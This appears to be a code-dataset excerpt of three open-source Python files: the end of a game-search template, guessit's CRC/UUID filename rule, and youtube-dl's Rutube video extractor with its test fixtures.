# to help a human player understand his options.
print(state)
tg = TemplateGame(TemplateState('A')) # this is the game we play interactively.
myGames = {
myGame: [
play, won, lost, tied, winin1
# won,
# winin1, losein1, winin3, losein3, winin5,
# lost,
],
tg: [
# these are the states we tabulate when we test AB(1), AB(2), etc.
TemplateState('B'),
TemplateState('C'),
]
}
| mit |
Jusedawg/SickRage | lib/guessit/rules/properties/crc.py | 34 | 2273 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
crc and uuid properties
"""
from rebulk.remodule import re
from rebulk import Rebulk
from ..common.validators import seps_surround
def crc():
"""
Builder for rebulk object.
:return: Created Rebulk object
:rtype: Rebulk
"""
rebulk = Rebulk().regex_defaults(flags=re.IGNORECASE)
rebulk.defaults(validator=seps_surround)
rebulk.regex('(?:[a-fA-F]|[0-9]){8}', name='crc32',
conflict_solver=lambda match, other: match
if other.name in ['episode', 'season']
else '__default__')
rebulk.functional(guess_idnumber, name='uuid',
conflict_solver=lambda match, other: match
if other.name in ['episode', 'season']
else '__default__')
return rebulk
_DIGIT = 0
_LETTER = 1
_OTHER = 2
_idnum = re.compile(r'(?P<uuid>[a-zA-Z0-9-]{20,})') # 1.0, (0, 0))
def guess_idnumber(string):
"""
Guess id number function
:param string:
:type string:
:return:
:rtype:
"""
# pylint:disable=invalid-name
ret = []
matches = list(_idnum.finditer(string))
for match in matches:
result = match.groupdict()
switch_count = 0
switch_letter_count = 0
letter_count = 0
last_letter = None
last = _LETTER
for c in result['uuid']:
if c in '0123456789':
ci = _DIGIT
elif c in 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ':
ci = _LETTER
if c != last_letter:
switch_letter_count += 1
last_letter = c
letter_count += 1
else:
ci = _OTHER
if ci != last:
switch_count += 1
last = ci
# only return the result as probable if we alternate often between
# char type (more likely for hash values than for common words)
switch_ratio = float(switch_count) / len(result['uuid'])
letters_ratio = (float(switch_letter_count) / letter_count) if letter_count > 0 else 1
if switch_ratio > 0.4 and letters_ratio > 0.4:
ret.append(match.span())
return ret
| gpl-3.0 |
spvkgn/youtube-dl | youtube_dl/extractor/rutube.py | 20 | 11470 | # coding: utf-8
from __future__ import unicode_literals
import re
import itertools
from .common import InfoExtractor
from ..compat import (
compat_str,
compat_parse_qs,
compat_urllib_parse_urlparse,
)
from ..utils import (
determine_ext,
bool_or_none,
int_or_none,
try_get,
unified_timestamp,
url_or_none,
)
class RutubeBaseIE(InfoExtractor):
def _download_api_info(self, video_id, query=None):
if not query:
query = {}
query['format'] = 'json'
return self._download_json(
'http://rutube.ru/api/video/%s/' % video_id,
video_id, 'Downloading video JSON',
'Unable to download video JSON', query=query)
@staticmethod
def _extract_info(video, video_id=None, require_title=True):
title = video['title'] if require_title else video.get('title')
age_limit = video.get('is_adult')
if age_limit is not None:
age_limit = 18 if age_limit is True else 0
uploader_id = try_get(video, lambda x: x['author']['id'])
category = try_get(video, lambda x: x['category']['name'])
return {
'id': video.get('id') or video_id if video_id else video['id'],
'title': title,
'description': video.get('description'),
'thumbnail': video.get('thumbnail_url'),
'duration': int_or_none(video.get('duration')),
'uploader': try_get(video, lambda x: x['author']['name']),
'uploader_id': compat_str(uploader_id) if uploader_id else None,
'timestamp': unified_timestamp(video.get('created_ts')),
'category': [category] if category else None,
'age_limit': age_limit,
'view_count': int_or_none(video.get('hits')),
'comment_count': int_or_none(video.get('comments_count')),
'is_live': bool_or_none(video.get('is_livestream')),
}
def _download_and_extract_info(self, video_id, query=None):
return self._extract_info(
self._download_api_info(video_id, query=query), video_id)
def _download_api_options(self, video_id, query=None):
if not query:
query = {}
query['format'] = 'json'
return self._download_json(
'http://rutube.ru/api/play/options/%s/' % video_id,
video_id, 'Downloading options JSON',
'Unable to download options JSON',
headers=self.geo_verification_headers(), query=query)
def _extract_formats(self, options, video_id):
formats = []
for format_id, format_url in options['video_balancer'].items():
ext = determine_ext(format_url)
if ext == 'm3u8':
formats.extend(self._extract_m3u8_formats(
format_url, video_id, 'mp4', m3u8_id=format_id, fatal=False))
elif ext == 'f4m':
formats.extend(self._extract_f4m_formats(
format_url, video_id, f4m_id=format_id, fatal=False))
else:
formats.append({
'url': format_url,
'format_id': format_id,
})
self._sort_formats(formats)
return formats
def _download_and_extract_formats(self, video_id, query=None):
return self._extract_formats(
self._download_api_options(video_id, query=query), video_id)
class RutubeIE(RutubeBaseIE):
IE_NAME = 'rutube'
IE_DESC = 'Rutube videos'
_VALID_URL = r'https?://rutube\.ru/(?:video|(?:play/)?embed)/(?P<id>[\da-z]{32})'
_TESTS = [{
'url': 'http://rutube.ru/video/3eac3b4561676c17df9132a9a1e62e3e/',
'md5': '1d24f180fac7a02f3900712e5a5764d6',
'info_dict': {
'id': '3eac3b4561676c17df9132a9a1e62e3e',
'ext': 'mp4',
'title': 'Раненный кенгуру забежал в аптеку',
'description': 'http://www.ntdtv.ru ',
'duration': 81,
'uploader': 'NTDRussian',
'uploader_id': '29790',
'timestamp': 1381943602,
'upload_date': '20131016',
'age_limit': 0,
},
}, {
'url': 'http://rutube.ru/play/embed/a10e53b86e8f349080f718582ce4c661',
'only_matching': True,
}, {
'url': 'http://rutube.ru/embed/a10e53b86e8f349080f718582ce4c661',
'only_matching': True,
}, {
'url': 'http://rutube.ru/video/3eac3b4561676c17df9132a9a1e62e3e/?pl_id=4252',
'only_matching': True,
}, {
'url': 'https://rutube.ru/video/10b3a03fc01d5bbcc632a2f3514e8aab/?pl_type=source',
'only_matching': True,
}]
@classmethod
def suitable(cls, url):
return False if RutubePlaylistIE.suitable(url) else super(RutubeIE, cls).suitable(url)
@staticmethod
def _extract_urls(webpage):
return [mobj.group('url') for mobj in re.finditer(
r'<iframe[^>]+?src=(["\'])(?P<url>(?:https?:)?//rutube\.ru/embed/[\da-z]{32}.*?)\1',
webpage)]
def _real_extract(self, url):
video_id = self._match_id(url)
info = self._download_and_extract_info(video_id)
info['formats'] = self._download_and_extract_formats(video_id)
return info
class RutubeEmbedIE(RutubeBaseIE):
IE_NAME = 'rutube:embed'
IE_DESC = 'Rutube embedded videos'
_VALID_URL = r'https?://rutube\.ru/(?:video|play)/embed/(?P<id>[0-9]+)'
_TESTS = [{
'url': 'http://rutube.ru/video/embed/6722881?vk_puid37=&vk_puid38=',
'info_dict': {
'id': 'a10e53b86e8f349080f718582ce4c661',
'ext': 'mp4',
'timestamp': 1387830582,
'upload_date': '20131223',
'uploader_id': '297833',
'description': 'Видео группы ★http://vk.com/foxkidsreset★ музей Fox Kids и Jetix<br/><br/> восстановлено и сделано в шикоформате subziro89 http://vk.com/subziro89',
'uploader': 'subziro89 ILya',
'title': 'Мистический городок Эйри в Индиан 5 серия озвучка subziro89',
},
'params': {
'skip_download': True,
},
}, {
'url': 'http://rutube.ru/play/embed/8083783',
'only_matching': True,
}, {
# private video
'url': 'https://rutube.ru/play/embed/10631925?p=IbAigKqWd1do4mjaM5XLIQ',
'only_matching': True,
}]
def _real_extract(self, url):
embed_id = self._match_id(url)
# Query may contain private videos token and should be passed to API
# requests (see #19163)
query = compat_parse_qs(compat_urllib_parse_urlparse(url).query)
options = self._download_api_options(embed_id, query)
video_id = options['effective_video']
formats = self._extract_formats(options, video_id)
info = self._download_and_extract_info(video_id, query)
info.update({
'extractor_key': 'Rutube',
'formats': formats,
})
return info
class RutubePlaylistBaseIE(RutubeBaseIE):
def _next_page_url(self, page_num, playlist_id, *args, **kwargs):
return self._PAGE_TEMPLATE % (playlist_id, page_num)
def _entries(self, playlist_id, *args, **kwargs):
next_page_url = None
for pagenum in itertools.count(1):
page = self._download_json(
next_page_url or self._next_page_url(
pagenum, playlist_id, *args, **kwargs),
playlist_id, 'Downloading page %s' % pagenum)
results = page.get('results')
if not results or not isinstance(results, list):
break
for result in results:
video_url = url_or_none(result.get('video_url'))
if not video_url:
continue
entry = self._extract_info(result, require_title=False)
entry.update({
'_type': 'url',
'url': video_url,
'ie_key': RutubeIE.ie_key(),
})
yield entry
next_page_url = page.get('next')
if not next_page_url or not page.get('has_next'):
break
def _extract_playlist(self, playlist_id, *args, **kwargs):
return self.playlist_result(
self._entries(playlist_id, *args, **kwargs),
playlist_id, kwargs.get('playlist_name'))
def _real_extract(self, url):
return self._extract_playlist(self._match_id(url))
class RutubeChannelIE(RutubePlaylistBaseIE):
IE_NAME = 'rutube:channel'
IE_DESC = 'Rutube channels'
_VALID_URL = r'https?://rutube\.ru/tags/video/(?P<id>\d+)'
_TESTS = [{
'url': 'http://rutube.ru/tags/video/1800/',
'info_dict': {
'id': '1800',
},
'playlist_mincount': 68,
}]
_PAGE_TEMPLATE = 'http://rutube.ru/api/tags/video/%s/?page=%s&format=json'
class RutubeMovieIE(RutubePlaylistBaseIE):
IE_NAME = 'rutube:movie'
IE_DESC = 'Rutube movies'
_VALID_URL = r'https?://rutube\.ru/metainfo/tv/(?P<id>\d+)'
_TESTS = []
_MOVIE_TEMPLATE = 'http://rutube.ru/api/metainfo/tv/%s/?format=json'
_PAGE_TEMPLATE = 'http://rutube.ru/api/metainfo/tv/%s/video?page=%s&format=json'
def _real_extract(self, url):
movie_id = self._match_id(url)
movie = self._download_json(
self._MOVIE_TEMPLATE % movie_id, movie_id,
'Downloading movie JSON')
return self._extract_playlist(
movie_id, playlist_name=movie.get('name'))
class RutubePersonIE(RutubePlaylistBaseIE):
IE_NAME = 'rutube:person'
IE_DESC = 'Rutube person videos'
_VALID_URL = r'https?://rutube\.ru/video/person/(?P<id>\d+)'
_TESTS = [{
'url': 'http://rutube.ru/video/person/313878/',
'info_dict': {
'id': '313878',
},
'playlist_mincount': 37,
}]
_PAGE_TEMPLATE = 'http://rutube.ru/api/video/person/%s/?page=%s&format=json'
class RutubePlaylistIE(RutubePlaylistBaseIE):
IE_NAME = 'rutube:playlist'
IE_DESC = 'Rutube playlists'
_VALID_URL = r'https?://rutube\.ru/(?:video|(?:play/)?embed)/[\da-z]{32}/\?.*?\bpl_id=(?P<id>\d+)'
_TESTS = [{
'url': 'https://rutube.ru/video/cecd58ed7d531fc0f3d795d51cee9026/?pl_id=3097&pl_type=tag',
'info_dict': {
'id': '3097',
},
'playlist_count': 27,
}, {
'url': 'https://rutube.ru/video/10b3a03fc01d5bbcc632a2f3514e8aab/?pl_id=4252&pl_type=source',
'only_matching': True,
}]
_PAGE_TEMPLATE = 'http://rutube.ru/api/playlist/%s/%s/?page=%s&format=json'
@classmethod
def suitable(cls, url):
if not super(RutubePlaylistIE, cls).suitable(url):
return False
params = compat_parse_qs(compat_urllib_parse_urlparse(url).query)
return params.get('pl_type', [None])[0] and int_or_none(params.get('pl_id', [None])[0])
def _next_page_url(self, page_num, playlist_id, item_kind):
return self._PAGE_TEMPLATE % (item_kind, playlist_id, page_num)
def _real_extract(self, url):
qs = compat_parse_qs(compat_urllib_parse_urlparse(url).query)
playlist_kind = qs['pl_type'][0]
playlist_id = qs['pl_id'][0]
return self._extract_playlist(playlist_id, item_kind=playlist_kind)
| unlicense |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.